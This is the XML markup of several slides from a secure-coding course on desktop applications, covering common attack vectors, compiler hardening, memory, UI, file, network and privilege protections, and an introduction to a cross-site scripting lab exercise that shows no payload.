            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="630821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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Desktop Application Attack Vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common attack vectors for desktop applications include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application user interface (user input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File and folder access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application and host system configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194361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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software projects and tools provide various security settings that will help you write secure code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Compiler may provide options to check for buffer overruns, uninitialized variables, memory leaks, improper exception handling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research those settings for your development environment, and enable them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vendors and development communities often provide documentation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example sites:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Best Practices for C++</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://msdn.microsoft.com/en-us/library/k3a3hzw7.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security and Programming (C# and Visual Basic)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://msdn.microsoft.com/en-us/library/ms233782.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Forms Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/dotnet/framework/winforms/windows-forms-security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure Coding Guidelines (.NET)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/dotnet/standard/security/secure-coding-guidelines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardening (Debian)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://wiki.debian.org/Hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C-Based Toolchain Hardening (Microsoft and GCC C, C++, and Objective C)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/C-Based_Toolchain_Hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Development Tool and Project Configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4279652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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820874" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible, limit the operating system your software runs on to the latest, most secure versions, and take advantage of the system's security controls to protect processes and memory from unauthorized access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use permissions and privileges to allow access to authorized users only.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid keeping sensitive data, passwords, and other sensitive data in memory. Encrypt such data when possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test and review your code, and provide protections against vulnerabilities such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Direct memory manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypassing authentication and authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replacing content such as application settings, trusted paths and executables, trusted hosts, update servers, passwords, and private keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DLL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shell code injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Memory in Desktop Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290"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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEA1165A-9171-48F9-BFD8-CD8C4F554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491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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820874" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not retain sensitive data in user interface controls (including hidden components) any longer than necessary (for example, when an entry form is no longer showing to the user).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify that it is not possible to bypass security controls, such as input fields or query string parameters that enable users to inject their own commands, shells, or terminals that the user can "break out of," and so forth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure the User Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290"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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6037B894-14A7-4F57-A08E-E73250084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50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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820874" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not store any sensitive data within the application's executable code (e.g., Windows application assembly).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you must store sensitive data within the application's executable code, use an unmanaged coding language like C/C++.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid using default database ports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carefully set file permissions for files and folders (including all application resources) to provide access only to authorized users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure file integrity through enforced naming conventions, digital signing, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify and prevent "back door" access to files and content, such as public functions that can be run without authentication, unused services and protocols enabled by default, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid storing sensitive data in accessible locations such as the Windows Registry, and use strong encryption if you must </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>store data in such locations.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect File and Data Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290"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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C7C200F-770C-4713-8DFD-477523EDD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541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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820874" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that local and network firewall rules are in place. If possible, check for this within the application before any sensitive data is communicated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not transmit sensitive data, files, passwords, or settings on the network without strong encryption.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Network Communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152400" y="1302040"/>
            <a:ext cx="1828801" cy="1319989"/>
            <a:chOff x="152400" y="1302040"/>
            <a:chExt cx="1828801" cy="1319989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12290"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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AC81417-769E-4434-B0A1-DF93F78EE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418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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1302040"/>
            <a:ext cx="6820874" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application user privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service account privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service configuration privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database account privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote share permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure the Software Configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290" name="Picture 2" descr="Image result for desktop application png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="21456" t="16320" r="20669" b="16054"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1302040"/>
            <a:ext cx="1828801" cy="13199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092" y="1524000"/>
            <a:ext cx="951414" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:schemeClr val="bg1"/>
            </a:glow>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:glow rad="177800">
                    <a:schemeClr val="bg1">
                      <a:alpha val="52000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>Desktop</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:glow rad="177800">
                    <a:schemeClr val="bg1">
                      <a:alpha val="52000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:glow rad="177800">
                    <a:schemeClr val="bg1">
                      <a:alpha val="52000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E6FA0D5-CEAC-4ACE-9F5F-CD98789E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410200"/>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77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pPr/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation and output encoding are important protections against several different types of attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You'll assess the quality of the input validation and output encoding protections in the Catalog application by attempting to perform a basic cross-site scripting attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Finding Common Web Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F588E6D-758C-436D-8726-0849F257BFC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="5121808"/>
            <a:ext cx="1725124" cy="1630038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 4" descr="Image result for javascipt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22" y="5425440"/>
            <a:ext cx="608226" cy="37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49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8E1EE-A03B-4D79-BA02-7D9B84894F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture Placeholder 7" descr="A picture containing object, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C79C985F-EFF8-4A32-BD42-B1740AF9F08F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="1781" b="1781"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="2906723"/>
            <a:ext cx="5943600" cy="1147207"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48B0DDDD-64F5-44C1-8F33-F2D39E02A7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Privacy Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3631202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ivacy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
